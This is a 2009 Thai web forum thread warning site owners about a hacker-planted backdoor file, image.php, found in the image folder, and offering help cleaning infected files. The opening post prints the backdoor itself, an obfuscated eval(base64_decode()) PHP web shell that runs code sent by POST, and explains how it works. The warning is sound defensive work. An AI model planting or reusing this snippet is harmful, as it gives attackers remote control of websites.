ระวังอย่าชะล่าใจคนโดนโทรจัน กำจัดหมด อาจมี backdoor เหลือ

เริ่มโดย EThaiZone, 05 พฤษภาคม 2009, 00:23:42

หัวข้อก่อนหน้า - หัวข้อถัดไป

0 สมาชิก และ 1 ผู้มาเยือน กำลังดูหัวข้อนี้

พิมพ์
ลง หน้า1
การกระทำของผู้ใช้

EThaiZone

05 พฤษภาคม 2009, 00:23:42
พอดีตอนนี้กำลังปรึกษาเรื่องโทรจันกันกับคุณ sir_15
อนาคตผมอาจออกเป็นโค้ดสำหรับการกำจัดโทรจันให้ใช้กัน
แต่ว่าต้องอาศัยเพื่อนๆ ทุกคนช่วยกันส่งไฟล์ที่มีโทรจันมาให้ผม

เข้าเรื่องเตือนกันก่อน ให้ตรวจสอบโฟลเดอร์ image นะครับ
ถ้าข้างในมี image.php จะมีโค้ดแนวนี้

โค้ด เลือก
<?php
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMyMzAzZDJlMzEzMTMzMmQzMTM5MzMyZTMxMzMzYTZhNmM3NTcwNjU2MTNlMzAzNjM5MzMzMzM0MzMzMTMzJzs=')); 
?>

ให้ลบทิ้งเลย เป็นฝีมือคนแฮก เขาวาง backdoor ไว้
โดนเขาจะสามารถส่งโค้ด php ให้รูป POST แล้วสั่ง eval เพื่อทำงานได้

ดังนั้นเจอแล้วโปรดลบทันที  >:(

นอกนั้นไว้คุยกันทีหลัง

Poomkupz

#1
05 พฤษภาคม 2009, 00:33:54
ขอบคุณครับ ขอไปตรวจก่อน  :D

crazycat

#2
05 พฤษภาคม 2009, 00:37:17
+1

ถ้าจะเปิดให้ส่งข้อมูลโทรจันเมื่อไหร่ บอกได้เลยนะครับ จะได้ช่วยส่งมาให้นะครับ
[direct=http://www.jobxar.com]แหล่งหางานราชการ งานรัฐวิสาหกิจ[/direct]

EThaiZone

#3
05 พฤษภาคม 2009, 10:17:43
ขอขุดนะครับ เผื่อใครไม่ทราบ เพราะผมดันโพสตอนตีสอง  :D

ตอนนี้เปิดรับไฟล์ที่คิดว่าติดปัญหาโทรจันนะครับ
โดนให้อัพโหลดไฟล์เข้าเว็บอะไรก็ได้ แล้วส่งลิงค์มาให้ผมทาง PM

หรือถ้าใครหาไฟล์ที่เป็นปัญหาไม่เจอ ก็ให้แบ็กอัพทั้งโฟลเดอร์มัน
แล้วส่งมาให้ผมครับ รับรองข้อมูลจะไม่ถูกเปิดเผย ไม่ถูกเอาไปใช้อย่างอื่น
นอกจากทำการหาโค้ดที่เป็นปัญหา ได้เอามาเขียน regex เพื่อจัดการมันออกครับ

:)

enjoy-2-u

#5
05 พฤษภาคม 2009, 11:52:47
โทรจัน... มันจะมีป้อปอัพหน้าเว็บอ่าค่ะ แงๆ   :'( :'(
[direct=http://www.enjoyshopp.com]สินค้าแฮนด์เมด ขายส่งถูกๆๆ[/direct] < < เสื้อผ้า กระเป๋า รองเท้า เครื่องประดับ ของที่ระลึก
พิมพ์
ขึ้น หน้า1
การกระทำของผู้ใช้